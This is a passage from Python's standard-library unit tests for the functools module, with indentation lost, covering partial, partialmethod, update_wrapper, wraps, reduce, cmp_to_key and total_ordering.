p = self.partial(capture, 1, 2, a=10, b=20)
# attributes should be readable
self.assertEqual(p.func, capture)
self.assertEqual(p.args, (1, 2))
self.assertEqual(p.keywords, dict(a=10, b=20))
def test_argument_checking(self):
self.assertRaises(TypeError, self.partial) # need at least a func arg
try:
self.partial(2)()
except TypeError:
pass
else:
self.fail('First arg not checked for callability')
def test_protection_of_callers_dict_argument(self):
# a caller's dictionary should not be altered by partial
def func(a=10, b=20):
return a
d = {'a':3}
p = self.partial(func, a=5)
self.assertEqual(p(**d), 3)
self.assertEqual(d, {'a':3})
p(b=7)
self.assertEqual(d, {'a':3})
def test_kwargs_copy(self):
# Issue #29532: Altering a kwarg dictionary passed to a constructor
# should not affect a partial object after creation
d = {'a': 3}
p = self.partial(capture, **d)
self.assertEqual(p(), ((), {'a': 3}))
d['a'] = 5
self.assertEqual(p(), ((), {'a': 3}))
def test_arg_combinations(self):
# exercise special code paths for zero args in either partial
# object or the caller
p = self.partial(capture)
self.assertEqual(p(), ((), {}))
self.assertEqual(p(1,2), ((1,2), {}))
p = self.partial(capture, 1, 2)
self.assertEqual(p(), ((1,2), {}))
self.assertEqual(p(3,4), ((1,2,3,4), {}))
def test_kw_combinations(self):
# exercise special code paths for no keyword args in
# either the partial object or the caller
p = self.partial(capture)
self.assertEqual(p.keywords, {})
self.assertEqual(p(), ((), {}))
self.assertEqual(p(a=1), ((), {'a':1}))
p = self.partial(capture, a=1)
self.assertEqual(p.keywords, {'a':1})
self.assertEqual(p(), ((), {'a':1}))
self.assertEqual(p(b=2), ((), {'a':1, 'b':2}))
# keyword args in the call override those in the partial object
self.assertEqual(p(a=3, b=2), ((), {'a':3, 'b':2}))
def test_positional(self):
# make sure positional arguments are captured correctly
for args in [(), (0,), (0,1), (0,1,2), (0,1,2,3)]:
p = self.partial(capture, *args)
expected = args + ('x',)
got, empty = p('x')
self.assertTrue(expected == got and empty == {})
def test_keyword(self):
# make sure keyword arguments are captured correctly
for a in ['a', 0, None, 3.5]:
p = self.partial(capture, a=a)
expected = {'a':a,'x':None}
empty, got = p(x=None)
self.assertTrue(expected == got and empty == ())
def test_no_side_effects(self):
# make sure there are no side effects that affect subsequent calls
p = self.partial(capture, 0, a=1)
args1, kw1 = p(1, b=2)
self.assertTrue(args1 == (0,1) and kw1 == {'a':1,'b':2})
args2, kw2 = p()
self.assertTrue(args2 == (0,) and kw2 == {'a':1})
def test_error_propagation(self):
def f(x, y):
x / y
self.assertRaises(ZeroDivisionError, self.partial(f, 1, 0))
self.assertRaises(ZeroDivisionError, self.partial(f, 1), 0)
self.assertRaises(ZeroDivisionError, self.partial(f), 1, 0)
self.assertRaises(ZeroDivisionError, self.partial(f, y=0), 1)
def test_weakref(self):
f = self.partial(int, base=16)
p = proxy(f)
self.assertEqual(f.func, p.func)
f = None
self.assertRaises(ReferenceError, getattr, p, 'func')
def test_with_bound_and_unbound_methods(self):
data = list(map(str, range(10)))
join = self.partial(str.join, '')
self.assertEqual(join(data), '0123456789')
join = self.partial(''.join)
self.assertEqual(join(data), '0123456789')
def test_nested_optimization(self):
partial = self.partial
inner = partial(signature, 'asdf')
nested = partial(inner, bar=True)
flat = partial(signature, 'asdf', bar=True)
self.assertEqual(signature(nested), signature(flat))
def test_nested_partial_with_attribute(self):
# see issue 25137
partial = self.partial
def foo(bar):
return bar
p = partial(foo, 'first')
p2 = partial(p, 'second')
p2.new_attr = 'spam'
self.assertEqual(p2.new_attr, 'spam')
def test_repr(self):
args = (object(), object())
args_repr = ', '.join(repr(a) for a in args)
kwargs = {'a': object(), 'b': object()}
kwargs_reprs = ['a={a!r}, b={b!r}'.format_map(kwargs),
'b={b!r}, a={a!r}'.format_map(kwargs)]
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
self.assertEqual(f'{name}({capture!r})', repr(f))
f = self.partial(capture, *args)
self.assertEqual(f'{name}({capture!r}, {args_repr})', repr(f))
f = self.partial(capture, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
f = self.partial(capture, *args, **kwargs)
self.assertIn(repr(f),
[f'{name}({capture!r}, {args_repr}, {kwargs_repr})'
for kwargs_repr in kwargs_reprs])
def test_recursive_repr(self):
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
self.assertEqual(repr(f), '%s(...)' % (name,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
self.assertEqual(repr(f), '%s(%r, ...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
self.assertEqual(repr(f), '%s(%r, a=...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
def test_pickle(self):
with self.AllowPickle():
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertEqual(signature(f_copy), signature(f))
def test_copy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.copy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIs(f_copy.attr, f.attr)
self.assertIs(f_copy.args, f.args)
self.assertIs(f_copy.keywords, f.keywords)
def test_deepcopy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.deepcopy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIsNot(f_copy.attr, f.attr)
self.assertIsNot(f_copy.args, f.args)
self.assertIsNot(f_copy.args[0], f.args[0])
self.assertIsNot(f_copy.keywords, f.keywords)
self.assertIsNot(f_copy.keywords['bar'], f.keywords['bar'])
def test_setstate(self):
f = self.partial(signature)
f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(signature(f),
(capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), dict(a=10), None))
self.assertEqual(signature(f), (capture, (1,), dict(a=10), {}))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), None, None))
#self.assertEqual(signature(f), (capture, (1,), {}, {}))
self.assertEqual(f(2, b=20), ((1, 2), {'b': 20}))
self.assertEqual(f(2), ((1, 2), {}))
self.assertEqual(f(), ((1,), {}))
f.__setstate__((capture, (), {}, None))
self.assertEqual(signature(f), (capture, (), {}, {}))
self.assertEqual(f(2, b=20), ((2,), {'b': 20}))
self.assertEqual(f(2), ((2,), {}))
self.assertEqual(f(), ((), {}))
def test_setstate_errors(self):
f = self.partial(signature)
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}))
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}, {}, None))
self.assertRaises(TypeError, f.__setstate__, [capture, (), {}, None])
self.assertRaises(TypeError, f.__setstate__, (None, (), {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, None, {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, [], {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, (), [], None))
def test_setstate_subclasses(self):
f = self.partial(signature)
f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
s = signature(f)
self.assertEqual(s, (capture, (1,), dict(a=10), {}))
self.assertIs(type(s[1]), tuple)
self.assertIs(type(s[2]), dict)
r = f()
self.assertEqual(r, ((1,), {'a': 10}))
self.assertIs(type(r[0]), tuple)
self.assertIs(type(r[1]), dict)
f.__setstate__((capture, BadTuple((1,)), {}, None))
s = signature(f)
self.assertEqual(s, (capture, (1,), {}, {}))
self.assertIs(type(s[1]), tuple)
r = f(2)
self.assertEqual(r, ((1, 2), {}))
self.assertIs(type(r[0]), tuple)
def test_recursive_pickle(self):
with self.AllowPickle():
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(RecursionError):
pickle.dumps(f, proto)
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.args[0], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.keywords['a'], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
# Issue 6083: Reference counting bug
def test_setstate_refcount(self):
class BadSequence:
def __len__(self):
return 4
def __getitem__(self, key):
if key == 0:
return max
elif key == 1:
return tuple(range(1000000))
elif key in (2, 3):
return {}
raise IndexError
f = self.partial(object)
self.assertRaises(TypeError, f.__setstate__, BadSequence())
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
if c_functools:
partial = c_functools.partial
class AllowPickle:
def __enter__(self):
return self
def __exit__(self, type, value, tb):
return False
def test_attributes_unwritable(self):
# attributes should not be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
try:
del p.__dict__
except TypeError:
pass
else:
self.fail('partial object allowed __dict__ to be deleted')
def test_manually_adding_non_string_keyword(self):
p = self.partial(capture)
# Adding a non-string/unicode keyword to partial kwargs
p.keywords[1234] = 'value'
r = repr(p)
self.assertIn('1234', r)
self.assertIn("'value'", r)
with self.assertRaises(TypeError):
p()
def test_keystr_replaces_value(self):
p = self.partial(capture)
class MutatesYourDict(object):
def __str__(self):
p.keywords[self] = ['sth2']
return 'astr'
# Raplacing the value during key formatting should keep the original
# value alive (at least long enough).
p.keywords[MutatesYourDict()] = ['sth']
r = repr(p)
self.assertIn('astr', r)
self.assertIn("['sth']", r)
class TestPartialPy(TestPartial, unittest.TestCase):
partial = py_functools.partial
class AllowPickle:
def __init__(self):
self._cm = replaced_module("functools", py_functools)
def __enter__(self):
return self._cm.__enter__()
def __exit__(self, type, value, tb):
return self._cm.__exit__(type, value, tb)
if c_functools:
class CPartialSubclass(c_functools.partial):
pass
class PyPartialSubclass(py_functools.partial):
pass
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
if c_functools:
partial = CPartialSubclass
# partial subclasses are not optimized for nested calls
test_nested_optimization = None
class TestPartialPySubclass(TestPartialPy):
partial = PyPartialSubclass
class TestPartialMethod(unittest.TestCase):
class A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertFalse(hasattr(obj.both, "__self__"))
self.assertFalse(hasattr(obj.nested, "__self__"))
self.assertFalse(hasattr(obj.over_partial, "__self__"))
self.assertFalse(hasattr(obj.static, "__self__"))
self.assertFalse(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
for obj in [self.A, self.a]:
with self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
with self.assertRaises(TypeError):
class B(object):
method = functools.partialmethod(None, 1)
def test_repr(self):
self.assertEqual(repr(vars(self.A)['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
def test_abstract(self):
class Abstract(abc.ABCMeta):
@abc.abstractmethod
def add(self, x, y):
pass
add5 = functools.partialmethod(add, 5)
self.assertTrue(Abstract.add.__isabstractmethod__)
self.assertTrue(Abstract.add5.__isabstractmethod__)
for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
self.assertFalse(getattr(func, '__isabstractmethod__', False))
class TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
for name in assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
for name in updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
for key in wrapped_attr:
if name == "__dict__" and key == "__wrapped__":
# __wrapped__ is overwritten by the update code
continue
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This is a new annotation'):
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is a bald faced lie"
def wrapper(b:'This is the prior annotation'):
pass
functools.update_wrapper(wrapper, f)
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
def wrapper():
pass
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.__annotations__, {})
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
pass
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes for updating
del wrapper.dict_attr
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
@support.requires_docstrings
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_builtin_update(self):
# Test for bug #1576241
def wrapper():
pass
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertTrue(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is still a bald faced lie"
@functools.wraps(f)
def wrapper():
pass
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
@functools.wraps(f, (), ())
def wrapper():
pass
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
return f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
pass
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestReduce(unittest.TestCase):
if c_functools:
func = c_functools.reduce
def test_reduce(self):
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n += 1
return self.sofar[i]
def add(x, y):
return x + y
self.assertEqual(self.func(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
self.func(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.func(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.func(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.func(add, Squares(10)), 285)
self.assertEqual(self.func(add, Squares(10), 0), 285)
self.assertEqual(self.func(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.func)
self.assertRaises(TypeError, self.func, 42, 42)
self.assertRaises(TypeError, self.func, 42, 42, 42)
self.assertEqual(self.func(42, "1"), "1") # func is never called with one item
self.assertEqual(self.func(42, "", "1"), "1") # func is never called with one item
self.assertRaises(TypeError, self.func, 42, (42, 42))
self.assertRaises(TypeError, self.func, add, []) # arg 2 must not be empty sequence with no initial value
self.assertRaises(TypeError, self.func, add, "")
self.assertRaises(TypeError, self.func, add, ())
self.assertRaises(TypeError, self.func, add, object())
class TestFailingIter:
def __iter__(self):
raise RuntimeError
self.assertRaises(RuntimeError, self.func, add, TestFailingIter())
self.assertEqual(self.func(add, [], None), None)
self.assertEqual(self.func(add, [], 42), 42)
class BadSeq:
def __getitem__(self, index):
raise ValueError
self.assertRaises(ValueError, self.func, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
class SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
if 0 <= i < self.n:
return i
else:
raise IndexError
from operator import add
self.assertEqual(self.func(add, SequenceClass(5)), 10)
self.assertEqual(self.func(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.func, add, SequenceClass(0))
self.assertEqual(self.func(add, SequenceClass(0), 42), 42)
self.assertEqual(self.func(add, SequenceClass(1)), 0)
self.assertEqual(self.func(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.func(add, d), "".join(d.keys()))
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
self.assertNotIsInstance(k, collections.Hashable)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
if c_functools:
cmp_to_key = c_functools.cmp_to_key
class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
cmp_to_key = staticmethod(py_functools.cmp_to_key)
class TestTotalOrdering(unittest.TestCase):
def test_total_ordering_lt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) > A(2))
def test_total_ordering_le(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __le__(self, other):
return self.value <= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) >= A(2))
def test_total_ordering_gt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __gt__(self, other):
return self.value > other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) < A(1))
def test_total_ordering_ge(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __ge__(self, other):
return self.value >= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) <= A(1))
def test_total_ordering_no_overwrite(self):
# new methods should not overwrite existing
@functools.total_ordering
class A(int):
pass
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
def test_no_operations_defined(self):
with self.assertRaises(ValueError):
@functools.total_ordering
class A:
pass
def test_type_error_when_not_implemented(self):
# bug 10042; ensure stack overflow does not occur
# when decorated types return NotImplemented
@functools.total_ordering
class ImplementsLessThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value == other.value
return False
def __lt__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value < other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value == other.value
return False
def __gt__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value > other.value
return NotImplemented
@functools.total_ordering
class ImplementsLessThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value == other.value
return False
def __le__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value <= other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value == other.value
return False
def __ge__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value >= other.value
return NotImplemented
@functools.total_ordering
class ComparatorNotImplemented:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ComparatorNotImplemented):
return self.value == other.value
return False
def __lt__(self, other):
return NotImplemented
with self.subTest("LT < 1"), self.assertRaises(TypeError):
ImplementsLessThan(-1) < 1
with self.subTest("LT < LE"), self.assertRaises(TypeError):
ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
with self.subTest("LT < GT"), self.assertRaises(TypeError):
ImplementsLessThan(1) < ImplementsGreaterThan(1)
with self.subTest("LE <= LT"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
with self.subTest("LE <= GE"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
with self.subTest("GT > GE"), self.assertRaises(TypeError):
ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
with self.subTest("GT > LT"), self.assertRaises(TypeError):
